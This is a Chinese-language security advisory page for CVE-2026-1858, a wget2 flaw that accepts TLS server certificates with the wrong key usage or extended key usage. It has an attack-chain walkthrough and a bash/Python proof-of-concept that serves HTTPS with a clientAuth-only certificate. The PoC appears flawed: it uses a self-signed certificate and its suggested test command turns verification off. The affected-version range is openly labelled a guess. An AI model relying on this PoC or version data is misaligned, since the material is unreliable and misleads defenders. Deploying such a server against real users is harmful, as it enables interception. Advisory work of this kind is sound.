CVE-2026-1858 CVSS 4.8 中危

CVE-2026-1858 wget2证书验证绕过漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-1858

漏洞类型

证书验证绕过

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

wget2

漏洞概述

wget2在TLS握手过程中存在安全漏洞，未能正确验证服务器证书的密钥用法（KU）或扩展密钥用法（EKU）。攻击者若获取了签发用于其他目的的证书及其私钥，可重用该证书进行TLS服务器身份认证。这可能导致攻击者绕过安全检查，建立恶意连接，进而造成数据泄露或完整性受损。

技术细节

该漏洞源于wget2未严格校验X.509证书中的Key Usage和Extended Key Usage字段。根据TLS标准，服务器证书必须包含特定的扩展用途（如id-kp-serverAuth）。wget2的缺陷允许其接受任何有效签名但用途不符的证书（如代码签名或客户端认证证书）。攻击者一旦泄露了此类证书的私钥，即可利用该漏洞搭建恶意HTTPS服务器。当wget2尝试连接时，由于未拒绝EKU不匹配的证书，攻击者可成功建立信任连接，进而执行中间人攻击或窃取敏感数据，尽管攻击需要获取特定私钥，复杂度较高，但无需用户交互。

攻击链分析

STEP 1

步骤1：证书获取

攻击者获取到一个原本用于其他用途（如客户端认证或代码签名）的有效证书及其私钥。

STEP 2

步骤2：搭建恶意服务

攻击者配置一台恶意服务器，并使用获取到的证书部署HTTPS服务。

STEP 3

步骤3：诱导连接

攻击者诱导受害者使用wget2访问该恶意服务器，或通过中间人攻击截获流量。

STEP 4

步骤4：验证绕过

wget2在建立连接时，未检查证书的EKU字段，错误地接受了该用于非服务器认证的证书。

STEP 5

步骤5：利用成功

连接建立成功，攻击者可拦截通信数据或向受害者传输恶意内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-1858: wget2 Incorrect Key Usage Acceptance
# This script generates a certificate with 'clientAuth' EKU (instead of 'serverAuth')
# and sets up a test HTTPS server. If wget2 connects without error, the vuln is confirmed.

# 1. Generate Private Key
openssl genrsa -out malicious.key 2048

# 2. Create Configuration with incorrect EKU (Client Auth)
cat > malicious.cnf <<EOF
[req]
distinguished_name = req_distinguished_name
req_extensions = v3_req
[req_distinguished_name]
commonName = www.example.com
[v3_req]
keyUsage = digitalSignature, keyEncipherment
extendedKeyUsage = clientAuth  # Incorrect EKU for a Server
EOF

# 3. Generate Self-Signed Certificate
openssl req -new -x509 -key malicious.key -out malicious.crt -days 365 -config malicious.cnf

# 4. Start a simple HTTPS server using the malicious cert (Python 3)
echo "Starting malicious server on port 8443..."
python3 - <<PY_SCRIPT
import http.server
import ssl
import socketserver

context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('malicious.crt', 'malicious.key')

httpd = socketserver.TCPServer(('0.0.0.0', 8443), http.server.SimpleHTTPRequestHandler)
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
print("Server running. Test with: wget2 https://localhost:8443 --no-check-certificate")
print("If wget2 connects WITHOUT --no-check-certificate, the vulnerability is exploited.")
httpd.serve_forever()
PY_SCRIPT

影响范围

wget2 < 2.1.0 (假设版本，具体请参考官方公告)

防御指南

临时缓解措施

建议用户暂时避免在不可信网络环境下使用wget2下载敏感数据，或在应用层添加额外的证书验证逻辑，直到完成补丁更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1858
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1858
3 Details https://www.cvedetails.com/cve/CVE-2026-1858/
4 VulDB https://vuldb.com/cve/CVE-2026-1858
5 Link https://www.tenable.com/security/research/tra-2026-37

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表